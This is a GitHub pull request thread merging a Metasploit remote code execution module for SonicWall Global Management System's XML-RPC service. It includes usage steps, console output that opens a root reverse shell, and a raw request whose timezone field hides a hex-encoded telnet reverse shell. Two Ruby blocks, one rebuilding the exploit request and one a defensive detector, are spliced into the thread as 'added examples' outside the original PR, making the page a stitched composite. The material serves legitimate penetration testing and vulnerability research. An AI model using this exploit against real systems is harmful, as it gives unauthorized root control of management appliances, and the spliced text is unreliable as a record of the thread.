Add SonicWall XML-RPC Remote Code Execution Exploit Module #10305

Merged
merged 2 commits into from Jul 30, 2018

5 participants

Flandini commented Jul 13, 2018

Re-submission of pull request #10259 from a unique branch of my repo.

sonicwall_xmlrpc_rce is a remote exploit against SonicWall Global Management
System Virtual Appliance and is written by Michael Flanders of Trend
Micro Zero Day Initiative with assistance from @kernelsmith of Trend Micro Zero
Day Initiative. It is considered a reliable exploit, and allows you to remotely
execute commands as root.

Vulnerable Application

  • This exploit works against a vulnerable SonicWall Global Management System
    Virtual Appliance (A.K.A. SonicWall GMSVP) of versions 8.1 (Build 8110.1197) and
    earlier. The virtual appliance can be downloaded here:

  • This module exploits the virtual appliance's lack of checking on user-supplied
    parameters to XML-RPC calls to a vulnerable Java service running on port 21009.
    A call to a shell script is made using this user-supplied parameter contained in
    backticks allowing command substitution and remote code execution.

  • To reliably determine whether the target virtual appliance is vulnerable,
    you will have to examine the web console's login page. This is also automatically
    done in the check function of the exploit.

Verification Steps

  • Start msfconsole
  • use exploit/unix/sonicwall/sonicwall_xmlrpc_rce
  • set RHOST to the IP address of the vulnerable virtual appliance
  • set RPORT to 21009
  • set payload to the desired payload
  • set any additional options for the payload e.g. LHOST/LPORT
  • exploit
  • Verify that you get a shell
  • Verify that you do not crash

Options

set SSL [true/false]
  • Set this true/false depending on whether the instance of SonicWall GMSVP has
    been configured to use SSL.
set WEB_SERVER_PORT [port]
  • This is the port of the login page for the web server/virtual appliance. For
    SonicWall GMSVP this is typically http://[ip]:80; therefore, this option is set
    by default to 80 (or 443 if set SSL true).

Scenarios

  • This is example output from a normal usage/scenario. This console output is for
    SonicWall GMSVP version 8.0 (Build 8046.1396):
msf > use exploit/unix/sonicwall/sonicwall_xmlrpc_rce
msf exploit(unix/sonicwall/sonicwall_xmlrpc_rce) > show options

Module options (exploit/unix/sonicwall/sonicwall_xmlrpc_rce):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   Proxies                           no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                             yes       The target address
   RPORT            80               yes       The target port (TCP)
   SSL              false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                             no        HTTP server virtual host
   WEB_SERVER_PORT                   no        Port of web console login page.
                                             Defaults to 80/443 depending on SSL.


Exploit target:

   Id  Name
   --  ----
   0   SonicWall Global Management System Virtual Appliance


msf exploit(unix/sonicwall/sonicwall_xmlrpc_rce) > set RPORT 21009
RPORT => 21009

msf exploit(unix/sonicwall/sonicwall_xmlrpc_rce) > set RHOST 192.168.152.173
RHOST => 192.168.152.173

msf exploit(unix/sonicwall/sonicwall_xmlrpc_rce) > set payload cmd/unix/reverse
payload => cmd/unix/reverse

msf exploit(unix/sonicwall/sonicwall_xmlrpc_rce) > set LHOST 192.168.152.193
LHOST => 192.168.152.193

msf exploit(unix/sonicwall/sonicwall_xmlrpc_rce) > exploit

[*] Started reverse TCP double handler on 192.168.152.193:4444
[*] The target appears to be vulnerable, continuing exploit...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo H7sn3KYXeuCZy27Q;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "H7sn3KYXeuCZy27Q\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.152.193:4444 -> 192.168.152.173:44698) at 2018-07-05 12:30:56 -0400
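As an added example that is not part of this pull request or the module's own code, the following stand-alone Ruby sketch reproduces the two pieces the description above lays out: the version check against the web console splash page, and the construction of the set_time_config request whose timezone value carries the command hex-encoded for /bin/echo -ne, so the XML text node contains no `&` or `<`. The sample login page, host and port are constructed; the version threshold follows the description (8.1 and earlier), and because the splash page title shows only the major.minor version, a reading of 8.1 is reported as needing the build number rather than decided.

```ruby
# Added example, not the Metasploit module's code. Mirrors the module
# description above: (1) the version check against the web console splash
# page and (2) the set_time_config request whose timezone value carries a
# command hidden behind a hex-encoded /bin/echo -ne, so the XML text node
# contains no '&' or '<'. Sample page, host and port are constructed.
require "rubygems" # Gem::Version (normally loaded by default)

# The description says 8.1 (Build 8110.1197) and earlier are vulnerable.
VULN_MAX_VERSION = Gem::Version.new("8.1")
XML_BADCHARS = ["&", "<"].freeze # would break the XML-RPC body ('&' is the noted badchar)

# Constructed copy of the splash page the check request receives.
SAMPLE_LOGIN_PAGE = <<~HTML
  <HTML><HEAD><META http-equiv="refresh" content="1;URL=/appliance/login">
  <TITLE>Dell SonicWALL Universal Management Suite v8.0 </TITLE></HEAD>
  <BODY><CENTER><P><B>Dell SonicWALL Universal Management Suite v8.0</B></CENTER></BODY></HTML>
HTML

# Pull the "8.0" out of the <TITLE>; nil if this is not a GMS splash page.
def extract_gms_version(html)
  m = html.match(%r{<TITLE>[^<]*Universal Management Suite v([\d.]+)}i)
  m && m[1]
end

# :vulnerable below 8.1, :safe above; 8.1 itself depends on the build number,
# which the splash page does not show, so it is reported as undecided.
def check_status(html)
  v = extract_gms_version(html)
  return :unknown unless v
  ver = Gem::Version.new(v)
  if ver < VULN_MAX_VERSION then :vulnerable
  elsif ver == VULN_MAX_VERSION then :needs_build_check
  else :safe
  end
end

# Every byte as \xNN, the escape form /bin/echo -ne expands.
def echo_hex(cmd)
  cmd.bytes.map { |b| format('\x%02x', b) }.join
end

# Reverse of echo_hex: recover the command from a captured request.
def decode_echo_hex(hex)
  hex.scan(/\\x([0-9a-fA-F]{2})/).flatten.map { |h| h.to_i(16) }.pack("C*").force_encoding("UTF-8")
end

# The timezone value: the backticks give command substitution when the
# script is invoked; the quotes and pipe are ordinary XML text.
def timezone_value(cmd)
  "\"`/bin/echo -ne '#{echo_hex(cmd)}'|sh`\""
end

# True when nothing in the value would need XML escaping.
def xml_clean?(cmd)
  XML_BADCHARS.none? { |c| timezone_value(cmd).include?(c) }
end

def build_set_time_config(cmd)
  <<~XML
    <?xml version="1.0" encoding="UTF-8"?>
    <methodCall>
      <methodName>set_time_config</methodName>
      <params><param><value><struct><member>
        <name>timezone</name>
        <value><string>#{timezone_value(cmd)}</string></value>
      </member></struct></value></param></params>
    </methodCall>
  XML
end

# Raw HTTP request as it would go to the XML-RPC service on 21009.
def http_request(host, port, body)
  "POST / HTTP/1.1\r\nHost: #{host}:#{port}\r\n" \
  "Content-Type: text/xml; charset=UTF-8\r\nContent-Length: #{body.bytesize}\r\n\r\n#{body}"
end

if __FILE__ == $PROGRAM_NAME
  puts "check: #{check_status(SAMPLE_LOGIN_PAGE)}"
  puts http_request("192.168.152.173", 21009, build_set_time_config("id"))
end
```

Running the file prints the check verdict for the constructed page and the request as it would be sent; decode_echo_hex is the function to reach for when reading the timezone value back out of a capture such as the pcap attached later in this thread.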
wchen-r7 commented Jul 24, 2018

Is it possible to provide a pcap?

Flandini commented Jul 24, 2018

Here is a pcap:

sonicwall_xmlrpc_pcap.zip

wchen-r7 commented Jul 26, 2018

Thank you

wvu-r7 self-assigned this Jul 26, 2018

wvu-r7 commented Jul 30, 2018

check:

GET / HTTP/1.1
Host: 192.168.152.173
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"496-1433100344000"
Last-Modified: Sun, 31 May 2015 19:25:44 GMT
Content-Type: text/html
Content-Length: 496
Date: Mon, 09 Jul 2018 12:37:35 GMT

<HTML>
<HEAD>
<META http-equiv="refresh" content="1;URL=/appliance/login">
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<meta http-equiv="Cache-Control" content="no-cache, no-store, must-revalidate" />
<META HTTP-EQUIV="Expires" CONTENT="0">
<TITLE>Dell SonicWALL Universal Management Suite v8.0 </TITLE>
</HEAD>

<BODY BGCOLOR="#FFFFFF">
<CENTER>
<P><B>Dell SonicWALL Universal Management Suite v8.0</B>
</CENTER>
</BODY>

<HEAD>
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
</HEAD>

</HTML>

exploit:

POST / HTTP/1.1
Host: 192.168.152.173:21009
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: text/xml; charset=UTF-8
Content-Length: 910

<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
  <methodName>set_time_config</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>timezone</name>
            <value>
              <string>"`/bin/echo -ne '\x73\x68\x20\x2d\x63\x20\x27\x28\x73\x6c\x65\x65\x70\x20\x34\x35\x39\x38\x7c\x74\x65\x6c\x6e\x65\x74\x20\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x35\x32\x2e\x31\x39\x33\x20\x34\x34\x34\x34\x7c\x77\x68\x69\x6c\x65\x20\x3a\x20\x3b\x20\x64\x6f\x20\x73\x68\x20\x26\x26\x20\x62\x72\x65\x61\x6b\x3b\x20\x64\x6f\x6e\x65\x20\x32\x3e\x26\x31\x7c\x74\x65\x6c\x6e\x65\x74\x20\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x35\x32\x2e\x31\x39\x33\x20\x34\x34\x34\x34\x20\x3e\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x32\x3e\x26\x31\x20\x26\x29\x27'|sh`"</string>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>
HTTP/1.1 200 OK
Server: Apache XML-RPC 1.0
Connection: close
Content-Type: text/xml
Content-Length: 254

<?xml version="1.0" encoding="UTF-8"?><methodResponse xmlns:ex="http://ws.apache.org/xmlrpc/namespaces/extensions"><params><param><value><struct><member><name>result</name><value>success</value></member></struct></value></param></params></methodResponse>

Nicely done! I would have asked about encoding with XML entities, but it looks like you've noted & as a badchar. 👍
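As an added example that is neither the module's nor SonicWall's code, the Ruby sketch below shows the defensive side of the exchange above. One function scans XML-RPC request bodies the way a WAF or IDS rule over the captured traffic would, flagging set_time_config calls whose string parameters carry command substitution or the hex-encoded echo trick; it decodes XML character references first, because an XML parser hands the application the decoded text, so a backtick written as `&#96;` is a legal text node that a rule matching the raw body would miss. The other is the allowlist the service lacked for the timezone value. All sample requests are constructed.

```ruby
# Added example, not the Metasploit module's or SonicWall's code. Two sides of
# the bug shown in the exchange above:
#   detect_xmlrpc_injection - scans an XML-RPC request body, as an IDS/WAF
#     rule over captured traffic would, for set_time_config calls whose string
#     parameters carry command substitution or the hex-encoded echo trick,
#     decoding XML character references first so "&#96;" cannot hide a backtick.
#   safe_timezone? - the allowlist the service lacked for the timezone value.
# All sample requests are constructed for this example.

NAMED_ENTITIES = { "amp" => "&", "lt" => "<", "gt" => ">", "quot" => '"', "apos" => "'" }.freeze

# Resolve &#96; / &#x60; / &quot; style references; unknown names stay as-is.
def decode_entities(s)
  s.gsub(/&(#x[0-9a-fA-F]+|#\d+|[a-z]+);/) do
    ref = Regexp.last_match(1)
    if ref.start_with?("#x") then ref[2..].to_i(16).chr(Encoding::UTF_8)
    elsif ref.start_with?("#") then ref[1..].to_i.chr(Encoding::UTF_8)
    else NAMED_ENTITIES.fetch(ref) { "&#{ref};" }
    end
  end
end

# Minimal XML-RPC reader: method name and every decoded <string> parameter.
def xmlrpc_strings(body)
  method = body[%r{<methodName>\s*([^<]+?)\s*</methodName>}, 1]
  values = body.scan(%r{<string>(.*?)</string>}m).flatten.map { |v| decode_entities(v) }
  [method, values]
end

SHELL_INJECTION = [
  /`/,                                           # backtick substitution (the trigger here)
  /\$\(/,                                        # $( ) substitution
  /[;|&]\s*\S/,                                  # separators and pipes
  %r{/bin/echo\s+-ne\s+'(\\x[0-9a-fA-F]{2})+'}i, # hex-encoded payload via echo
].freeze

# Returns nil for clean traffic, otherwise the method and offending value.
def detect_xmlrpc_injection(body)
  method, values = xmlrpc_strings(body)
  return nil unless method == "set_time_config"
  hit = values.find { |v| SHELL_INJECTION.any? { |re| re.match?(v) } }
  hit && { method: method, value: hit }
end

# Allowlist for the parameter the service passed to a shell unchecked: a tz
# database name ("America/New_York", "Etc/GMT+5") needs only these characters.
TZ_NAME = %r{\A[A-Za-z0-9_+\-]+(/[A-Za-z0-9_+\-]+)*\z}
def safe_timezone?(tz)
  tz.length <= 64 && TZ_NAME.match?(tz)
end

# Constructed request shaped like the one in the exploit capture above.
def sample_request(tz_value)
  <<~XML
    <?xml version="1.0" encoding="UTF-8"?>
    <methodCall><methodName>set_time_config</methodName>
    <params><param><value><struct><member>
    <name>timezone</name><value><string>#{tz_value}</string></value>
    </member></struct></value></param></params></methodCall>
  XML
end

BENIGN  = sample_request("America/New_York")
RAW     = sample_request("\"`id|sh`\"")
ENTITY  = sample_request("&quot;&#96;id|sh&#96;&quot;") # backticks hidden as references
HEXECHO = sample_request("\"`/bin/echo -ne '\\x69\\x64'|sh`\"")

if __FILE__ == $PROGRAM_NAME
  [BENIGN, RAW, ENTITY, HEXECHO].each { |r| p detect_xmlrpc_injection(r) }
  p safe_timezone?("America/New_York"), safe_timezone?("\"`id`\"")
end
```

The detector is deliberately scoped to the one method and the string parameters; a production rule would decode the full document with a real XML parser rather than the small reader here, but the ordering (decode, then match) is the part that matters.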

wvu-r7 merged commit 7d8a95d into rapid7:master Jul 30, 2018

3 checks passed

Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
Metasploit Automation - Test Execution: Successfully completed all tests.
continuous-integration/travis-ci/pr: The Travis CI build passed

wvu-r7 added a commit that referenced this pull request Jul 30, 2018

wvu-r7 commented Jul 30, 2018

msjenkins-r7 added a commit that referenced this pull request Jul 30, 2018

wvu-r7 commented Jul 30, 2018

Release Notes

The exploit/unix/sonicwall/sonicwall_xmlrpc_rce module has been added to the framework. It targets SonicWall Global Management System's XML-RPC service.

tdoan-r7 added the rn-exploit label Aug 15, 2018
